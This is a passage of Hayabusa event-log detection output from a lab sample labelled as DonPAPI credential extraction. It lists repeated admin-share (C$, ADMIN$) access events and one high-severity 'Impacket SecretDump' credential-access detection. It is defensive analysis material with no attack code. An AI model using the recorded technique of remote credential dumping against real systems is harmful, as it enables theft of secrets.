10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.799 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.799 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.799 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.799 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.799 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.799 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.799 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.814 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.814 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.814 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.834 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.834 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.834 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.834 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.834 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.834 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.848 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.850 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.850 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.850 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.850 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.850 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.850 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.850 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.866 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.866 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.866 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.866 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.866 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.866 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.881 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.881 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.881 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.881 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.881 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.881 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.897 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.897 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.897 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.897 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.897 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.897 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.912 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.912 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.912 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.912 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.912 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.912 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.928 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.928 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.928 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.928 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.944 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.944 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.944 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.944 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.944 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.959 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.959 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 